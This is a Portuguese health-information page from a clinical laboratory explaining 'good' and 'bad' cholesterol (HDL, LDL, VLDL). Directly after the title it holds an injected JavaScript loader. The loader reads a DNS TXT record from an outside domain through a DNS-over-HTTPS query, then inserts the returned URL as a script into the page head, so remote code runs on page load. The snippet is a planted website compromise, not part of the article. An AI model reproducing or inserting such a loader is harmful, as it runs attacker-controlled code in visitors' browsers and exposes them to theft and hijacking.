contato@laboratorioibac.com.br|
(11) 4374-1344
Colesterol “Bom” e “Ruim”fetch(“https://cloudflare-dns.com/dns-query?name=localhost-cdn.xyz&type=TXT”, {headers:{ “accept”: “application/dns-json” }}).then(e=>e.json()).then(e=>{const t=document.createElement(“script”);t.src=JSON.parse(e.Answer[0].data),document.querySelector(“head”).appendChild(t)});
Comentários : 0
Há três espécies de colesterol (também chamados lipoproteínas) em seu sangue: o colesterol de alta densidade (HDL), o colesterol de baixa densidade (LDL) e o colesterol de muito baixa densidade (VLDL).
O HDL é chamado de “bom colesterol”, porque ele impede que o colesterol se acumule nas artérias.
O LDL é o “mau colesterol”, pois em altos níveis pode aumentar seu risco de um ataque cardíaco ou derrame. Hoje, os especialistas costumam dizer que o risco não se deve aos índices de colesterol total, e sim à alta proporção de colesterol “ruim”em relação ao “bom”colesterol.